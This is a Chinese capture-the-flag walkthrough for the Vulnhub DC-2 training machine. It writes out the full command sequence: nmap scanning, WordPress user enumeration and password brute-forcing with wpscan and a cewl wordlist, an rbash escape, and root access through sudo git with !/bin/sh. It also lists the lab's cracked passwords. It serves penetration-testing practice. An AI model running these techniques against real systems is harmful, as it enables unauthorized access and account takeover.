Dc-2通关教程

dc-2通关解析

一.与DC-1非常相似,DC-2是另一个专门建立的易受攻击的实验室,目的是获得渗透测试领域的经验。与最初的DC-1一样,它是为初学者设计的。必须具备Linux技能并熟悉Linux命令行,还必须具有使用基本渗透测试工具的经验。就像DC-1一样,有五面旗帜,包括最后一面旗帜。和DC-1一样,旗子对初学者来说很重要,但对有经验的人来说就不那么重要了。简而言之,唯一真正有意义的旗帜,是最后一面旗帜。对于初学者来说,谷歌是你的朋友。好吧,除了所有的隐私问题等等。我没有探索实现root的所有方法,因为我放弃了我一直在研究的上一个版本,并从基本操作系统安装中完全重新开始。

和DC-1一样,有五个flag

  1. 环境下载

https://www.vulnhub.com/entry/dc-2,311/

  1. 环境安装

进入虚拟,点击打开虚拟机找到如下图文件导入即可(如果报错点击重试即可)完成之后点击虚拟机设置,将默认的乔连改为NAT。

  • 渗透靶场
  1. 先查自己kali本机的ip地址

Ifonfig

  1. 信息收集,找到靶机dc-2的真实ip

nmap -sP 192.168.45.0/24

探查端口及服务

nmap -A -p- -v 192.168.45.133(靶机ip)

发现开放了80端口,存在web服务,Apache/2.4.10,

发现开放了7744端口,开放了ssh服务,OpenSSH 6.7p1

  1. 访问web

192.168.45.133

发现不能访问成功,并且我们的ip直接转换成了域名,我们只需要修改一下hosts文件,增加一个ip域名指向即可

vim /etc/hosts

点击i输入靶机IP加靶机名

192.168.45.133 dc-2

输入完成后点击esc,shift加;wq回车即可

完成后再次访问或刷新一下便成功了

很明显便可以发现一个wordpress的站点,点击它

发现是flag1
大致意思如下:
你通常的单词列表可能不起作用,所以,也许你只是得小心点。
更多的密码总是更好,但有时你就是赢不了他们都是。
以一个身份登录,以查看下一个标志。
如果你找不到它,就以另一种身份登录。

意思就是暴力破解,账号密码

  1. 先进行目录扫描

dirb http://dc-2/

发现可疑后台地址,右键打开链接

打开后到了该页面

点击其它地址也没什么有用的东西

5.用户名枚举

前面我们提到这是一个wordpress的站,我们采用专门针对wordpress的工具wpscan来进行扫描

WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能该扫描器可以实现获取站点用户名,获取安装的所有插件、主题,以及存在漏洞的插件、主题,并提供漏洞信息。同时还可以实现对未加防护的Wordpress站点暴力破解用户名密码。

Wpscan一些常用语句:

wpscan --url http://dc-2

wpscan --url http://dc-2 --enumerate t 扫描主题

wpscan --url http://dc-2 --enumerate p 扫描插件

wpscan --url http://dc-2 --enumerate u 枚举用户

扫描wordpress版本

wpscan --url http://dc-2

得到版本为4.7.10

登录页面尝试登录
随机输入用户名密码,提示用户名不存在,似乎可以进行用户名枚举

先枚举用户

wpscan --url http://dc-2 --enumerate u

得到了三个用户

admin

jerry

tom

6.暴力破解出账号密码

根据flag1可以用暴力破解,我们使用cewl生成字典,

Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。除此之外,Cewl还提供了命令行工具。

cewl http://dc-2/ -w dc2.txt

使用wpscan进行暴力破解

wpscan --url http://dc-2 --passwords dc2.txt

得到了两个账号密码

jerry/adipiscing

tom/parturient

分别使用这两个账号密码登录站点

发现都可以成功登录

登录之后,我们看到flag2(jerry的账号)

点进去之后看到flag2提示信息,简单说就是如果wordpress行不通的话就会一个点,我们之前发现有ssh,我们看看ssh

  1. 进入ton家目录

Tom

Parturient

输入ssh tom@192.168.45.133 -p 7744

得到flag3

发现cat等多个产看命令不可用,可用less和vi

内容

  1. 尝试rbash绕过

查看可以使用命令

echo $PATH

cd进不去目录 使用ls直接查看目录信息

使用echo来绕过rbash

BASH_CMDS[a]=/bin/sh;a

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin

echo /*

  1. 进入jerry的家目录

先输入

Cd ..

ls

后输入

Cd jerry

Ls

得到flag4

输入cat flag4.txt查看提示信息

大致意思就是还没有结束。猜想需要提权才能获取到最终的flag,并且flag4 提示我们可以使用git,我们可以通过git来提权

使用tom用户无权限运行sudo 我们切换到jerry用户

我们可以看到无需root权限,jerry 可以使用 git

sudo -l  

  1. 提权

find / -user root -perm -4000 -print 2>/dev/null

jerry用户不可以直接sudo su

使用git命令进行提取

输入!/bin/sh,直接输shift加!往后输就行了

提权成功

输入whoami

  1. 发现final-flag.txt

cd /root

cat final-flag.txt

结束了,恭喜。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值